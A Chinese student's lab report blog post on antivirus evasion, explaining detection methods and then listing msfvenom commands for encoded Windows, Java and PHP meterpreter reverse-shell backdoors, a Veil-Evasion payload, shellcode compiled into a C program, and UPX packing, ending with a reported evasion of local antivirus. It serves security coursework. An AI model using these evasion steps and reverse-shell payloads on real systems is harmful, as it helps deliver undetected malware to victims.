2016424王启元 Exp3免杀原理与实现

基础问题回答

1、杀软是如何检测出恶意代码的?

(1)基于特征码的检测

特征码是能识别一个程序是一个病毒的一段不大于64字节的特征串。如果一个可执行文件包含这样的特征码则被杀毒软件检测为是恶意代码。

优点:检测效率高、能精确检测恶意软件类型和具体名称。

缺点:滞后性,不能检测不在特征库和变形的恶意软件,需频繁更新特征库。

(2)启发式恶意软件检测

一般在缺乏精确判定依据时,根据些片面特征去推断是否为恶意软件,比如如果一个软件在干通常是恶意软件干的事,看起来像个恶意软件,那就把它当成一个恶意软件。

优点:可以检测0-day恶意软件(0day是反盗版的打击对象,指在安全补丁发布前被了解和掌握的漏洞信息),具有一定通用性

缺点:实时监控系统行为,开销稍多,没有基于特征码的精确度高

(3)基于行为的恶意软件检测

基于行为的检测相当于是启发式的一种,或者是加入了行为监控的启发式。

优点:可发现未知病毒、可相当准确地预报未知的多数病毒。

缺点:可能误报、不能识别病毒名称、实现时有一定难度。

 

2、免杀是做什么?

即反杀毒技术,是一种能使病毒木马避免被杀毒软件查杀的技术。

 

3、免杀的基本方法有哪些?

1)变形特征码:

  • 只有EXE:
  • 加壳:压缩壳 加密壳
  • 有shellcode:有源代码:
    • encode编码、payload重新编译
  • 翻译成其他语言

(2)改变明目张胆的行为:

改变通讯方式

    • 尽量使用反弹式连接
    • 使用隧道技术
    • 加密通讯数据
      改变操作模式
    • 基于内存操作
    • 减少对系统的修改
    • 加入混淆作用的正常功能代码

 

  


 

1. 实践内容

  1.1 正确使用msf编码器(0.5分),msfvenom生成如jar之类的其他文件(0.5分),veil-evasion(0.5分),加壳工具(0.5分),使用shellcode编程(1分)

       1.1.1  使用msf生成了后门程序,使用VirusTotal或Virscan这两个网站对生成的后门程序进行扫描。

       扫描结果如下图:

(由于名字违规,改成文件名改成了wqy,之后的文件都以这个为基础,以文件名后添加1.2.3为区别)

可以看出不加任何处理的后门程序能够被大多数杀软检测到,下面我们用msf编码器对后门程序进行一次到多次的编码,并进行检测。

  • 一次编码使用命令: -e 选择编码器,-b是payload中需要去除的字符,该命令中为了使'\x00'不出现在shellcode中,因为shellcode以'\x00'为结束符

  •  十次编码使用命令:-i设置迭代次数msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 10 -b ‘\x00’ LHOST=192.168.137.128 LPORT=4324 -f exe > wqy1_backdoor.exe
  • 可见多次编码对免杀没有太大的效果

  • msfvenom生成jar文件
      • 生成java后门程序使用命令:msfvenom -p java/meterpreter/reverse_tcp LHOST=192.168.137.128 LPORT=4324 x> wqy_backdoor_java.jar
      • 这时只有7款软件能查出来

      • msfvenom生成php文件
          • 生成PHP后门程序使用命令:msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.137.128LPORT=4324 x> wqy3_backdoor.php
          • 这时只有一款软件发现病毒

          • 使用veil-evasion生成后门程序及检测

                  veil安装太费时间,拷贝了同学的虚拟机之后虚拟机kali地址有所改变变成了192.168.1.115

                  输入veil指令;

                 用use evasion命令进入Evil-Evasion;

                 输入命令use c/meterpreter/rev_tcp.py进入配置界面,如下图;

          • 设置反弹连接IP,命令为:set LHOST 192.168.1.115,注意此处的IP是KaliIP;
            • 设置端口,命令为:set LPORT 4324

          • 输入generate生成文件,接着输入你想要playload的名字:veil_c_4324

          • 检测一下:

          • 发现比之前有更多的软件可以检测出来了

          • 半手工注入Shellcode并执行
            • 首先使用命令:msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.115 LPORT=4324 -f c

          • 创建一个文件4324.exe,然后将unsigned char buf[]赋值到其中,代码如下:

          • 使用命令i686-w64-mingw32-g++ 4324.c -o 4324.exe

          • 使用VirusTota网页下检查结果

          • 加个壳

          • 使用压缩壳(UPX)

                给之前的4324.exe加个壳得到sxx_upxed.exe:

          • 扫描结果如下

          • 1.2 通过组合应用各种技术实现恶意代码免杀(0.5分)

             

            通过组合应用各种技术实现恶意代码免杀

          • 对c盘指定查杀

          • 发现并没有查杀到hyperion的可执行文件,成功免杀。

          • 实践总结与体会

             2.1实验总结

            从实验中知道了还是不能太依赖杀软。加壳基本上没什么用,使用veil-evasion将payload重新编译还可以,通过本次实验还是觉得电脑管家软件病毒库还是很齐全的基本上普通的病毒都能查杀。

             

             2.2开启杀软能绝对防止电脑中恶意代码吗?

                 不能绝对防止电脑中恶意代码,但是大部分还是可以被查杀。

posted on 2019-03-31 21:34  王启元  阅读(191)  评论(0编辑  收藏  举报

导航